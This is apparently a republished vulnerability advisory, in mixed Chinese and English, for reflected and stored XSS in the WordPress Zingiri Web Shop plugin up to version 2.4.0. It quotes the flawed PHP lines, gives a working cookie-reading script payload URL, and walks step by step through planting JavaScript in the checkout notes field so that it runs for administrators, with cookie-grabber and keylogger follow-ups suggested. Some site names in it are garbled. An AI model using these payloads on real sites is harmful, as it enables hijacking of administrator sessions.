Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities 作者: Mehmet Ince HdhCmsTest2cto测试数据 程序作者: http://HdhCmsTestzingiri测试数据 影响版本: 2.3.0 和 2.4.0已测试 标题: Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities 下载 地址:http://downloads.wordpress.org/plugin/zingiri-web-shop.2.4.0.zip 影响版本: 2.4.0 and older. 测试平台: version of 2.3.0 and 2.4.0 with Ubuntu 11.10 Server with Firefox browser. ############################################################################## /* ## BASIC XSS PS: 未认证执行 plugins/zingiri-web-shop/zing.inc.php line at 401. if ($process=='content' && $page!='ajax' && $page!='downldr') echo '<div class="zing_ws_page" id="zing_ws_'.$_GET['page'].'">'; 测试: http://HdhCmsTest2cto测试数据 /wordpress/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 'page' variable isn't properly sanitized before being used. ## 存储型 XSS PS: Attacker should be logged for exploit. ./fws/pages-front/onecheckout.php line 27-29 if (!empty($_POST['notes'])) { $notes=$_POST['notes']; } and line 348 <textarea name="notes" rows="5" style="width: 100%"><?php echo $notes;?></textarea><br /> 'notes' variable isn't properly sanitized before being used. That's very basic XSS vulnerabilities. But you dont need use fishing attack to target webpage's administrator. That application insert datas to database with that form. After your malicious code posted up, your javascrip code inserted to database with $_POST['notes'] variable. When administrator wanna see list of ordered items list. Java script codes will come from database and start working on Authenticated admin user side. After that You can use browser keylogger with BT5 tools or can usee cookie grabber. */ step 1: Login to wordpress. step 2: Go to "Shop" menu. It's should be stay at banner. http://6.6.6.102/wordpress/?page_id=14 step 3: Than you'll see list ot items. Click one of them. http://6.6.6.102/wordpress/?page=details&prod=2&cat=1&page_id=14 step 4: You can pass that form action. That wont be problem..! Click to "Order" button. step 5: There is confirmation about the Shopping. Click "checkout" to pass that page. step 6: It's final stage. Put you javascript payload to "Additional comments/questions" form. After you click checkout button, that form will get all of these input data with POST method. step 7: Click to "Checkout"
查看更多关于Wordpress插件Zingiri Web Shop <= 2.4.0多个xss问题 - 网的详细内容...